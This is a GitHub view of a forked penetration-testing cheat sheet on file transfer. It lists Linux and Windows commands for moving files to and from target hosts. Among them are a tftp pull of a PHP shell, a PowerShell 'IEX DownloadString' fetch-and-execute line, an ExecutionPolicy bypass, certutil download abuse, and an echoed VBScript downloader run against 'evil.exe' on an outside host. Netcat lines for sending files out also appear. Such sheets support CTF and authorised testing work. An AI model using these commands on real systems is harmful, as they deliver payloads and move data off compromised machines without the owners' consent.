forked from Gimpy42/CheatSheet
-
Notifications
You must be signed in to change notification settings - Fork 2
/
file_transfer
69 lines (50 loc) · 3.16 KB
/
file_transfer
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
# FILE TRANSFER
## Linux
# PYTHON
python -m SimpleHTTPServer <PORT>
python2.7 -c "from urllib import urlretrieve; urlretrieve('<URL>', '<DESTINATION_FILE>')"
# FTP
sudo python3 -m pyftpdlib -p 21 -w
# Tftp same as FTP but if non interactive:
tftp 191.168.0.101 <<< "get shell5555.php shell5555.php"
# SMB
sudo smbserver.py -smb2support liodeus .
# WGET
wget <URL> -o <OUT_FILE>
# CURL
curl <URL> -o <OUT_FILE>
# NETCAT
nc -lvp 1234 > <OUT_FILE>
nc <IP> 1234 < <IN_FILE>
# SCP
scp <SOURCE_FILE> <USER>@<IP>:<DESTINATION_FILE>
# PHP
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
###########################################
## Windows
# FTP
echo open <IP> 21 > ftp.txt echo anonymous>> ftp.txt echo password>> ftp.txt echo binary>> ftp.txt echo GET <FILE> >> ftp.txt echo bye>> ftp.txt
ftp -v -n -s:ftp.txt
# SMB
copy \\<IP>\<PATH>\<FILE> # Linux -> Windows
copy <FILE> \\<IP>\<PATH>\ # Windows -> Linux
# Powershell
powershell.exe (New-Object System.Net.WebClient).DownloadFile('<URL>', '<DESTINATION_FILE>')
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('<URL>')
powershell "wget <URL>"
echo $storageDir = $pwd > wget.ps1 & echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://192.168.1.101/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1 & echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
# Python
python.exe -c "from urllib import urlretrieve; urlretrieve('<URL>', '<DESTINATION_FILE>')"
# CertUtil
certutil.exe -urlcache -split -f "<URL>"
# NETCAT
nc -lvp 1234 > <OUT_FILE>
nc <IP> 1234 < <IN_FILE>
# CURL
curl <URL> -o <OUT_FILE>
# VBScript
echo strUrl = WScript.Arguments.Item(0) > wget.vbs & echo StrFile = WScript.Arguments.Item(1) >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs & echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs & echo Err.Clear >> wget.vbs & echo Set http = Nothing >> wget.vbs & echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs & echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs & echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs & echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs & echo http.Open "GET",strURL,False >> wget.vbs & echo http.Send >> wget.vbs & echo varByteArray = http.ResponseBody >> wget.vbs & echo Set http = Nothing >> wget.vbs & echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs & echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs & echo strData = "" >> wget.vbs & echo strBuffer = "" >> wget.vbs & echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs & echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs & echo Next >> wget.vbs & echo ts.Close >> wget.vbs
cscript wget.vbs http://192.168.10.5/evil.exe evil.exe